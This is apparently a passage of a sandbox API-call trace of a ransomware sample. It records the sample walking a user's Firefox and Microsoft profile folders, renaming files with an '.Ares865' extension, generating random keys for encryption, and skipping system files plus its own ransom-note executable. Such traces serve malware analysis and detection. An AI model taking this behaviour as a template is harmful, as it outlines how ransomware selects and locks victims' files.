hTemplateFile=0x0) returned 0x118 [0108.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29) returned 1 [0108.225] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.230] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.231] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0108.233] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.Ares865") returned 117 [0108.233] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.ares865"), dwFlags=0x1) returned 1 [0108.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.235] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2) returned 1 [0108.235] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.238] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.239] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.239] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.239] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0108.240] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0108.240] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0108.241] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.Ares865") returned 136 [0108.241] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata.ares865"), dwFlags=0x1) returned 1 [0108.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.244] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0108.244] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0108.244] CloseHandle (hObject=0x0) returned 0 [0108.244] CloseHandle (hObject=0x118) returned 1 [0108.244] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50596420, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x50596420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0108.244] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0108.244] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x505bc580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x505bc580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0108.244] lstrcmpiW (lpString1="idb", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0108.244] lstrcmpiW (lpString1="idb", lpString2="aoldtz.exe") returned 1 [0108.245] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="windows") returned -1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="bootmgr") returned 1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="temp") returned -1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="pagefile.sys") returned -1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="boot") returned 1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="ids.txt") returned -1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="ntuser.dat") returned -1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="perflogs") returned -1 [0108.245] lstrcmpiW (lpString1="idb", lpString2="MSBuild") returned -1 [0108.245] lstrlenW (lpString="idb") returned 3 [0108.245] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 128 [0108.245] lstrcpyW (in: lpString1=0x2cce4ee, lpString2="idb" | out: lpString1="idb") returned="idb" [0108.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0108.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf6) returned 0x2d6cf0 [0108.245] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0108.245] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x505bc580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x505bc580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 0 [0108.245] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0108.245] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0108.245] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0108.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0108.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0108.247] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.Ares865") returned 140 [0108.247] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.ares865"), dwFlags=0x1) returned 1 [0108.248] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.248] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3035) returned 1 [0108.249] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.249] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.249] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.252] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.253] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.253] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.Ares865") returned 140 [0108.253] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.ares865"), dwFlags=0x1) returned 1 [0108.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.255] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3035) returned 1 [0108.256] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.259] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.260] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.260] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Crash Reports", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Crash Reports" [0108.261] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.Ares865") returned 110 [0108.261] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\crash reports\\installtime20131025151332"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\crash reports\\installtime20131025151332.ares865"), dwFlags=0x1) returned 1 [0108.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\crash reports\\installtime20131025151332.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.263] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10) returned 1 [0108.263] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.264] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.264] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.267] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.267] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.267] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.268] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Extensions", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Extensions" [0108.268] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft" [0108.269] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Word", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Word" [0108.269] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Word\\STARTUP", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Word\\STARTUP" [0108.269] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\UProof", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\UProof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\UProof" [0108.270] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\UProof\\CUSTOM.DIC.Ares865") returned 82 [0108.270] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\uproof\\custom.dic"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\UProof\\CUSTOM.DIC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\uproof\\custom.dic.ares865"), dwFlags=0x1) returned 1 [0108.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\UProof\\CUSTOM.DIC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\uproof\\custom.dic.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.272] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2) returned 1 [0108.273] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f05a0) returned 1 [0108.273] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.273] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0108.276] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f05a0) returned 1 [0108.277] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.277] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0108.277] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Templates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Templates" [0108.278] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Templates\\Normal.dotm.Ares865") returned 86 [0108.278] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\templates\\normal.dotm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Templates\\Normal.dotm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\templates\\normal.dotm.ares865"), dwFlags=0x1) returned 1 [0108.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Templates\\Normal.dotm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\templates\\normal.dotm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.280] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20635) returned 1 [0108.280] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f05a0) returned 1 [0108.280] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.280] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0108.283] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f05a0) returned 1 [0108.284] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.284] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0108.285] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates" [0108.285] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My" [0108.286] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\CTLs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\CTLs" [0108.286] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\SystemCertificates\\My\\CRLs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS 